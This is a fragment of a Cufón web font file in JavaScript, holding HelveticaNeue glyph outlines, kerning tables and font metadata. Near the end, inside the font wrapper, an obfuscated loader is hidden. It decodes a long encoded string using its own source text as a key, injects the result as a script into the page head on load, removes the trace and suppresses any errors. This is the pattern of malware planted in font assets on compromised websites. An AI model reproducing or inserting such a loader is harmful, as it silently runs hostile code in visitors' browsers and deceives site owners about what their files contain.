-48,-90,-40,-88,4r-31,0v2,-46,37,-62,79,-62v33,0,70,7,70,51r0,95v-2,19,4,24,19,20xm81,-23v55,0,60,-27,57,-73v-24,18,-93,0,-93,46v0,20,17,27,36,27xm43,-262r18,0v6,20,20,29,41,29v21,0,28,-11,35,-29r19,0v-5,31,-25,49,-57,49v-33,0,-51,-17,-56,-49","w":193},{"d":"72,-237v-46,0,-44,67,0,67v21,0,34,-16,34,-33v0,-17,-13,-34,-34,-34xm20,-203v0,-28,23,-52,52,-52v28,0,52,24,52,52v0,29,-24,51,-52,51v-29,0,-52,-22,-52,-51","w":144},{"d":"177,-186r-81,211v-17,44,-35,58,-75,46r0,-28v17,8,36,6,43,-12r13,-32r-74,-185r34,0r56,152r52,-152r32,0xm80,-212r31,-52r39,0r-47,52r-23,0","w":180,"k":{",":27,".":27}},{"d":"45,-93v0,45,26,70,58,70v32,0,58,-25,58,-70v0,-45,-26,-70,-58,-70v-32,0,-58,25,-58,70xm13,-93v0,-55,31,-97,90,-97v59,0,91,42,91,97v0,54,-32,97,-91,97v-59,0,-90,-43,-90,-97","w":206},{"d":"79,-255r0,154r-25,0r0,-111r-41,0r0,-18v23,0,43,-5,48,-25r18,0xm54,10r157,-271r23,0r-157,271r-23,0xm238,-124v-20,22,-35,47,-54,70r54,0r0,-70xm260,-154r0,100r22,0r0,19r-22,0r0,35r-22,0r0,-35r-72,0r0,-20r76,-99r18,0","w":300},{"d":"45,-93v0,45,26,70,58,70v32,0,58,-25,58,-70v0,-45,-26,-70,-58,-70v-32,0,-58,25,-58,70xm13,-93v0,-55,31,-97,90,-97v59,0,91,42,91,97v0,54,-32,97,-91,97v-59,0,-90,-43,-90,-97xm86,-212r31,-52r39,0r-47,52r-23,0","w":206},{"d":"117,-226v-17,38,-29,81,-45,120r87,0xm-3,0r101,-257r38,0r100,257r-38,0r-28,-77r-108,0r-29,77r-36,0xm143,-287v-25,-1,-58,-31,-69,2r-19,0v5,-22,16,-40,39,-40v26,0,57,32,66,-2r19,0v-3,18,-13,41,-36,40","w":233,"k":{"v":6,"V":17,"\u2019":27,"T":33,"\u0162":33,"\u0164":33,"\u021a":33,"W":9,"\u0174":9,"Y":27,"\u00dd":27,"\u0176":27,"\u0178":27,"w":6,"\u0175":6,"y":6,"\u00fd":6,"\u00ff":6,"\u0177":6}},{"d":"62,-187r0,94v55,0,129,9,123,-47v6,-55,-68,-47,-123,-47xm62,0r-34,0r0,-257r34,0r0,41r79,0v51,0,79,28,79,76v0,48,-28,76,-79,76r-79,0r0,64","w":233},{"d":"177,0r-14,0v-24,21,-31,31,-31,42v0,21,30,19,36,5r12,6v-10,17,-24,23,-39,23v-9,0,-33,-1,-33,-30v0,-6,5,-27,40,-46r0,-30v-13,23,-34,34,-61,34v-94,2,-56,-109,-64,-190r31,0r0,126v0,23,14,37,37,37v77,1,52,-93,56,-163r30,0r0,186"},{"d":"181,-126r-32,0v-5,-23,-20,-37,-46,-37v-44,0,-58,35,-58,72v0,35,16,68,55,68v30,0,47,-17,51,-45r31,0v-7,46,-35,72,-82,72v-57,0,-87,-39,-87,-95v0,-56,29,-99,88,-99v42,0,75,20,80,64xm153,-264r-37,52r-33,0r-38,-52r31,0r24,35r26,-35r27,0","w":193},{"d":"45,-111r107,0v-2,-29,-22,-52,-53,-52v-32,0,-52,23,-54,52xm152,-59r30,0v-8,41,-38,63,-80,63v-59,0,-89,-41,-89,-98v0,-56,36,-96,87,-96v66,0,87,61,85,106r-140,0v-1,32,17,61,58,61v26,0,44,-12,49,-36xm45,-262r18,0v6,20,19,29,40,29v21,0,29,-11,36,-29r18,0v-5,31,-25,49,-57,49v-33,0,-50,-17,-55,-49","w":193},{"d":"45,-111r107,0v-2,-29,-22,-52,-53,-52v-32,0,-52,23,-54,52xm152,-59r30,0v-8,41,-38,63,-80,63v-59,0,-89,-41,-89,-98v0,-56,36,-96,87,-96v66,0,87,61,85,106r-140,0v-1,32,17,61,58,61v26,0,44,-12,49,-36xm101,-212r-47,-52r39,0r31,52r-23,0","w":193},{"d":"180,-190r-31,0v-3,-23,-19,-38,-43,-38v-51,-1,-63,60,-61,97v37,-63,142,-29,142,50v0,37,-21,85,-85,85v-76,0,-88,-69,-88,-122v0,-70,21,-137,94,-137v42,0,68,23,72,65xm103,-137v-34,0,-53,25,-53,57v0,32,20,57,53,57v33,0,51,-26,51,-56v0,-32,-16,-58,-51,-58"},{"d":"52,-238r0,90r-24,0r0,-90r24,0xm28,32r0,-90r24,0r0,90r-24,0","w":79},{"d":"198,0r0,-25v-13,20,-41,31,-67,31v-76,0,-117,-59,-117,-134v0,-77,44,-135,120,-135v24,0,53,8,64,27r0,-21r172,0r0,29r-137,0r0,81r126,0r0,29r-126,0r0,89r139,0r0,29r-174,0xm198,-182v1,-36,-27,-52,-63,-52v-58,0,-87,50,-87,108v0,58,30,103,86,103v36,0,64,-20,64,-50r0,-109","w":386},{"d":"86,0r0,-228r-85,0r0,-29r205,0r0,29r-85,0r0,228r-35,0","w":206,"k":{":":40,",":40,"-":46,".":40,";":40,"A":33,"\u00c0":33,"\u00c1":33,"\u00c2":33,"\u00c3":33,"\u00c4":33,"\u0100":33,"\u0102":33,"\u0104":33,"a":40,"\u00e0":40,"\u00e1":40,"\u00e2":40,"\u00e3":40,"\u00e5":40,"\u0101":40,"\u0103":40,"\u0105":40,"e":40,"\u00e8":40,"\u00e9":40,"\u00ea":40,"\u00eb":40,"\u0113":40,"\u0115":40,"\u0117":40,"\u0119":40,"\u011b":40,"o":40,"\u00f2":40,"\u00f3":40,"\u00f4":40,"\u00f5":40,"\u00f6":40,"\u014d":40,"\u014f":40,"\u0151":40,"u":33,"\u00f9":33,"\u00fa":33,"\u00fb":33,"\u00fc":33,"\u0169":33,"\u016b":33,"\u016d":33,"\u016f":33,"\u0171":33,"\u0173":33,"w":40,"\u0175":40,"y":40,"\u00fd":40,"\u00ff":40,"\u0177":40,"c":40,"\u00e7":40,"\u0107":40,"\u0109":40,"\u010b":40,"\u010d":40,"r":33,"\u0155":33,"\u0157":33,"\u0159":33,"s":40,"\u015b":40,"\u015d":40,"\u015f":40,"\u0161":40,"\u0219":40}}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+-1136-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("ZCA|*()op=_hZO$fb(3tsCs_W~)|A(_hW~9tp=DRAmve.1oQi$[|dJ{uAm[|dJ{[)Q6+b`N[)C)+b`NuA`b+b`N[dJ$+b`N[dJA+b`Nu.(3+b`NuA=A+b`N[dJb+b`NuA(m+b`N[d`k4WYVud`AkWYVudCsaWYVud`3BWYVud`D$WYVud`DB+oH+b`N[d=)+b`NuAC)+b`Nu.?3+b`N[)`3+b`N[dJ3NWYVud`NoWYVtd`stWYVudC{|WYVud`{uWYVud`s~WYVudC)BWYVudC{uWYVud`NuWYVud`4|WYVud`4abm[|dJM(.$[|dJM?dQb+b`NuA?D+b`Ntd=9+b`NuA`3+b`NuA`D+b`N[)(m+b`N[d?m+b`Ntd=3+b`NuAC3+b`N[d1m+b`NuA({6WYVudCD(WYVudC)?WYVud`{1WYVud`bBWYVud`{oWYVudCm$WYVudCs1WYVudC4~WYVudCs|WYVud`9QWYVudC.tWYVudC3$WYVudCd~WYVudCV~WYVudC.xWYVud`MkWYVudC9$WYVudC4oWYVudCmQWYVudCdxWYVudCs!WYVud`ABWYVud`BtWYVud`9kWYVud`M(WYVud`D(WYVud`)$)t)+b`sud`kxWYVud`+~WYVud`41WYVud`.tmm[|d?N[A3[|dJM$)Vb+b`Nu.NMOJ{3CYs9ZXd)ig4D5`Vm=W.Ap*+b@&^kQ?B$(RK6:2eHh}u[t1o|~ax!;fv_F8?9+b`NuA=D+b`N[)1DDWYVud`+uWYVudC4[WYVud`A?WYVud`s[WYVud`bQga[3.|[|d?Nt)$[|dJM?Am[|dJMBA3[|dJ{[im[|dJs[iC$+b`N[)=A+b`N[)J$+b`N[)~m+b`sud`)+b`N[)=4_WYVudC{1WYVud`+tWYVudCs~WYVud`MQWYVud`.|WYVud`4tWYVud`soWYVud`3kWYVud`b?WYVud`duWYVud`4uWYVud`3QWYVudCV1WYVudCVtWYVudCsxWYVud`+!WYVud`mQWYVud`4xWYVud`V|WYVud`saWYVud`{[WYVud`)kWYVud`N|WYVud`d[WYVud`9(WYVudC3?WYVudC3BWYVud`NtWYVud`V!WYVtdJ{oWYVud`d!*$[|dJ{1A3[|dJ{~d|[|dJ{a)`)+b`N[d~A+b`N[)`4hWYVud`.uWYVud`daWYVudCVu+3b..$[|dJ{|dJ$+b`N[)J3+b`N[d19&4W3kWYVud`.[*m[|dJMki3[|dJ{~)13+W3[|dJ{~)B62@=AK`m[|dJ{tim[|dJ{[)~D+b`N[d=m+b`Nu.13^WYVud`9$V$[|dJMB)m[|dJ{1.|[|dJM$.V[+b`NuAJ+KW$u}WYVudC)Q=m[|dJM$im)+b`N[)`AsWYVud`VxWYVud`d1WYVud`A(D$[|dJ{aiJm+b`sud`BkWYVud`sxg$[|dJ{|do_+b`Nu.=A+b`N[dC)FWYVud`m$WYVud`m?i3[|dJ{|)|[|dJ{|.V4o93[|dJMkd$[|dJM()?H+b`NuA?{HAm[|dJMk)|[|dJ{ui3[|dJMQ.$[|dJ{adWH+b`NuA=)+b`Nu.`$+b`Nu.1b+b`N[)?$+b`N[)1bR4|[|dJ{~.$[|dJ{o)Y|+b`NuA(A+b`NuAJ^tWYVudC.|*3[|dJ{~)3[|dJM?)3[|dJM(.|[|dJM?)mK^WYVud`)QWYVud`stWYVudC)kd3[|dJM?A$[|d?N[.|[|dJ{1)Yb+b`N[)?k+b`NuAJ$+b`NuAJ);WYVudCdu95Hbg3[|dJs[im[|dJ{a.m[|dJM(d3[|dJMQAB99WYVudC4tWO9tm$[|dJ{tdYA*WYVudC9BWYVud`s1`$[|dJ{[dQA+b`NuA?$+b`Nu.`D+b`Nu.=9:WYVud`d~b3[|dJMQ)3[|dJMB.$[|dJM?im[|dJMkdm[|dJ{o)$[|dJMk.m[|dJ{[AQ[+b`NuAJM+b`NuA?b+b`N[dJ)+b`Nu.?M+b`NuA(D}WYVudC9?WYVudC.1WYVudCd1WYVudCD$WYVud`+1WYVud`MBWYVud`{|WYVudCVx)$[|dJMk)$[|dJ{|d$4QXR)u*C$oZOsQZ5[6g`Ne+J|QXRNe*J|uX([$*(bopO[Rg=shAQ!R*Y$upYd_@aofp=.K.Q!}p1o}WQ^8iRbab|uhZ`vKg161@(mt*~H6p~3B+$uh+C[vACm~A=[}+C|$*RD+XR);AW9}p~$2.=DtWO!u*Y[1@(H+XRMeZ54}p5!oAW)oZC[}.~3op=_hX(k}+aDh.=|$Z5$(*asKi~Bv*Je2Z~B6A|H?=~$bW`|u=~$b&5BKZ5N^")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":200,"face":{"font-family":"HelveticaNeue","font-weight":400,"font-stretch":"normal","units-per-em":"360","panose-1":"2 11 6 4 2 2 2 2 2 4","ascent":"257","descent":"-103","x-height":"4","bbox":"-21 -350 372 77","underline-thickness":"18","underline-position":"-18","stemh":"27","stemv":"31","unicode-range":"U+0020-U+2122"}}));



